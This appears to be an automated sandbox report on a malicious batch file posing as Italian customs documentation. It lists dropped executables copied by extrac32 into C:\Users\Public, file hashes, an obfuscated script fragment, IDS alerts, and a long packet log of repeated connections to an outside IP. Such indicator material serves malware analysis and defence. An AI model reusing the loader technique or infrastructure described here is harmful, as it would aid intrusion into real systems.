                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................p...................@...........................0..^%.......x.......................d...........................p.......................7...............................text.............................. ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata..^%...0...&..................@....tls....4....`...........................rdata.......p......................@..@.reloc...d.......f..................@..B.rsrc....x.......x...^..............@..@.............p......................@..@................................................................................................

                                                  C:\Users\Public\alpha.exe

                                                  Download File
                                                  Process:C:\Windows\System32\extrac32.exe
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):289792
                                                  Entropy (8bit):6.135598950357573
                                                  Encrypted:false
                                                  SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                  MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                  SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                  SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                                  • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                  • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                  • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                  • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                  • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                  • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                  • Filename: Payment.cmd, Detection: malicious, Browse
                                                  • Filename: FACTURA.cmd, Detection: malicious, Browse
                                                  • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                  C:\Users\Public\kn.exe

                                                  Download File
                                                  Process:C:\Windows\System32\extrac32.exe
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1651712
                                                  Entropy (8bit):6.144018815244304
                                                  Encrypted:false
                                                  SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                  MD5:F17616EC0522FC5633151F7CAA278CAA
                                                  SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                  SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                  SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Users\Public\alpha.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):104
                                                  Entropy (8bit):4.403504238247217
                                                  Encrypted:false
                                                  SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                  MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                  SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                  SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                  SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                  Malicious:false
                                                  Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                                  Static File Info

                                                  General

                                                  File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                  Entropy (8bit):4.949900634415472
                                                  TrID:
                                                    File name:Documentazione_Doganale_richieste_di_copia.cmd
                                                    File size:3'584'667 bytes
                                                    MD5:e83eaefa47746764ed0708da11cf890f
                                                    SHA1:5986d2e1da1d6fa42825ae627ee688cac4530fd7
                                                    SHA256:13e2c237c2fa5b146ada50ad1be0be71832e42b745f2bc82daa52558807a7aa6
                                                    SHA512:d69fe44a64af8693c5d15dcc0d3773e3b30da540f90be0ba3addd1bbcf99c26632572f1a4eccf1838ac60da4e0d27b5700a4ebeeac8448f3c822e67399a9d251
                                                    SSDEEP:49152:f6DzaZKYLJqhTLqP8gTM0BiuWSIRbWRIi9b:v
                                                    TLSH:EBF530ABA9AE2685330427FF774FA9084A17DCD52A837FC402C617BCD41A64F1BD09D9
                                                    File Content Preview:@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ..........

                                                    File Icon

                                                    Icon Hash:9686878b929a9886

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-26T09:38:48.563344+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973150.7.187.218443TCP
                                                    2024-11-26T09:38:50.754265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973350.7.187.218443TCP
                                                    2024-11-26T09:38:52.954772+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973550.7.187.218443TCP
                                                    2024-11-26T09:38:55.168909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973750.7.187.218443TCP
                                                    2024-11-26T09:38:57.281145+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973950.7.187.218443TCP
                                                    2024-11-26T09:38:59.839817+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974150.7.187.218443TCP
                                                    2024-11-26T09:39:02.030386+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974450.7.187.218443TCP
                                                    2024-11-26T09:39:04.491017+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44974850.7.187.218443TCP
                                                    2024-11-26T09:39:06.616914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44975250.7.187.218443TCP
                                                    2024-11-26T09:39:08.762801+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44975550.7.187.218443TCP
                                                    2024-11-26T09:39:10.894037+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44975750.7.187.218443TCP
                                                    2024-11-26T09:39:12.993224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44975950.7.187.218443TCP
                                                    2024-11-26T09:39:15.086047+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976150.7.187.218443TCP
                                                    2024-11-26T09:39:17.307750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976350.7.187.218443TCP
                                                    2024-11-26T09:39:19.539915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976550.7.187.218443TCP
                                                    2024-11-26T09:39:21.686683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976750.7.187.218443TCP
                                                    2024-11-26T09:39:23.870915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976950.7.187.218443TCP
                                                    2024-11-26T09:39:26.009878+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44977150.7.187.218443TCP
                                                    2024-11-26T09:39:28.366489+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44977350.7.187.218443TCP
                                                    2024-11-26T09:39:30.558807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44977550.7.187.218443TCP
                                                    2024-11-26T09:39:32.727424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44977750.7.187.218443TCP
                                                    2024-11-26T09:39:34.821873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44977950.7.187.218443TCP
                                                    2024-11-26T09:39:36.950461+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44978150.7.187.218443TCP
                                                    2024-11-26T09:39:39.147343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44978350.7.187.218443TCP
                                                    2024-11-26T09:39:41.275676+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44978550.7.187.218443TCP
                                                    2024-11-26T09:39:43.417014+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44978950.7.187.218443TCP
                                                    2024-11-26T09:39:45.739224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44979650.7.187.218443TCP
                                                    2024-11-26T09:39:47.925418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44980350.7.187.218443TCP
                                                    2024-11-26T09:39:50.066597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44981050.7.187.218443TCP
                                                    2024-11-26T09:39:52.161402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44981750.7.187.218443TCP
                                                    2024-11-26T09:39:54.280482+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44982450.7.187.218443TCP
                                                    2024-11-26T09:39:56.417637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44983150.7.187.218443TCP
                                                    2024-11-26T09:39:58.550142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44983850.7.187.218443TCP
                                                    2024-11-26T09:40:00.801176+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44984550.7.187.218443TCP
                                                    2024-11-26T09:40:02.950972+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44985250.7.187.218443TCP
                                                    2024-11-26T09:40:05.091745+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44985950.7.187.218443TCP
                                                    2024-11-26T09:40:07.254696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44986650.7.187.218443TCP
                                                    2024-11-26T09:40:09.425427+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44987050.7.187.218443TCP
                                                    2024-11-26T09:40:11.592526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44987650.7.187.218443TCP
                                                    2024-11-26T09:40:13.726668+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44988150.7.187.218443TCP
                                                    2024-11-26T09:40:15.936904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44988750.7.187.218443TCP
                                                    2024-11-26T09:40:18.061957+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44989450.7.187.218443TCP
                                                    2024-11-26T09:40:20.180941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44990050.7.187.218443TCP
                                                    2024-11-26T09:40:22.438790+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44990750.7.187.218443TCP
                                                    2024-11-26T09:40:24.742215+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44991450.7.187.218443TCP
                                                    2024-11-26T09:40:26.861374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44992150.7.187.218443TCP
                                                    2024-11-26T09:40:29.007334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44992850.7.187.218443TCP
                                                    2024-11-26T09:40:31.208417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44993550.7.187.218443TCP
                                                    2024-11-26T09:40:33.341234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44994250.7.187.218443TCP
                                                    2024-11-26T09:40:35.405275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44994950.7.187.218443TCP
                                                    2024-11-26T09:40:37.498236+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44995550.7.187.218443TCP
                                                    2024-11-26T09:40:39.661000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44996250.7.187.218443TCP
                                                    2024-11-26T09:40:42.015913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44996950.7.187.218443TCP
                                                    2024-11-26T09:40:44.180953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44997650.7.187.218443TCP
                                                    2024-11-26T09:40:46.387362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44998350.7.187.218443TCP
                                                    2024-11-26T09:40:48.493864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44999050.7.187.218443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 26, 2024 09:38:46.870268106 CET49730443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:46.870311975 CET4434973050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:46.870410919 CET49730443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:46.874113083 CET49730443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:46.874185085 CET4434973050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:46.874262094 CET49730443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:47.099425077 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:47.099440098 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:47.099533081 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:47.123965025 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:47.123996019 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:48.563277960 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:48.563344002 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:48.567162037 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:48.567174911 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:48.567445993 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:48.619901896 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:48.676080942 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:48.723325968 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.076755047 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.076826096 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.077006102 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.098165989 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.098196983 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.098212004 CET49731443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.098221064 CET4434973150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.365808010 CET49732443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.365854979 CET4434973250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.365981102 CET49732443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.366280079 CET49732443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.366322994 CET4434973250.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.366393089 CET49732443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.386629105 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.386678934 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:49.386758089 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.387291908 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:49.387305021 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:50.754190922 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:50.754265070 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:50.755697012 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:50.755706072 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:50.755959988 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:50.757206917 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:50.799335003 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.267674923 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.267743111 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.267832994 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.268038034 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.268057108 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.268066883 CET49733443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.268079042 CET4434973350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.463581085 CET49734443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.463613987 CET4434973450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.463700056 CET49734443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.472110987 CET49734443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.472217083 CET4434973450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.472297907 CET49734443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.495465040 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.495520115 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:51.495611906 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.496052027 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:51.496078014 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:52.954546928 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:52.954771996 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:52.964067936 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:52.964092016 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:52.964484930 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:52.966177940 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.007342100 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.483617067 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.483699083 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.483766079 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.484087944 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.484110117 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.484149933 CET49735443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.484158039 CET4434973550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.693279982 CET49736443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.693327904 CET4434973650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.693425894 CET49736443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.693573952 CET49736443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.693604946 CET4434973650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.693698883 CET49736443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.706433058 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.706475973 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:53.706579924 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.706943989 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:53.706964016 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.168755054 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.168909073 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.170644045 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.170654058 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.171062946 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.172555923 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.215331078 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.699639082 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.699709892 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.699790955 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.700066090 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.700082064 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.700093985 CET49737443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.700098991 CET4434973750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.899390936 CET49738443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.899440050 CET4434973850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.899537086 CET49738443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.899661064 CET49738443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.899703026 CET4434973850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.899761915 CET49738443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.909651041 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.909684896 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:55.909881115 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.910104990 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:55.910120964 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:57.281054974 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:57.281145096 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:57.283329010 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:57.283354044 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:57.283688068 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:57.285033941 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:57.327374935 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.091033936 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.091111898 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.091236115 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.091393948 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.091394901 CET49739443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.091417074 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.091439962 CET4434973950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.296017885 CET49740443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.296081066 CET4434974050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.296156883 CET49740443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.296528101 CET49740443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.296576023 CET4434974050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.296641111 CET49740443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.306890965 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.306952953 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:58.307059050 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.307997942 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:58.308022022 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:59.839658976 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:59.839817047 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:59.841392040 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:59.841398954 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:59.841665030 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:38:59.845187902 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:38:59.891326904 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.359160900 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.359273911 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.359447002 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.359786034 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.359797955 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.359837055 CET49741443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.359843969 CET4434974150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.554398060 CET49743443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.554436922 CET4434974350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.554569006 CET49743443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.554678917 CET49743443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.554711103 CET4434974350.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.557063103 CET49743443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.565095901 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.565139055 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:00.565234900 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.565660954 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:00.565685034 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.030311108 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.030385971 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:02.040565014 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:02.040594101 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.040859938 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.042118073 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:02.083329916 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.558816910 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.558903933 CET4434974450.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:02.559024096 CET49744443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:02.559349060 CET49744443192.168.2.450.7.187.218
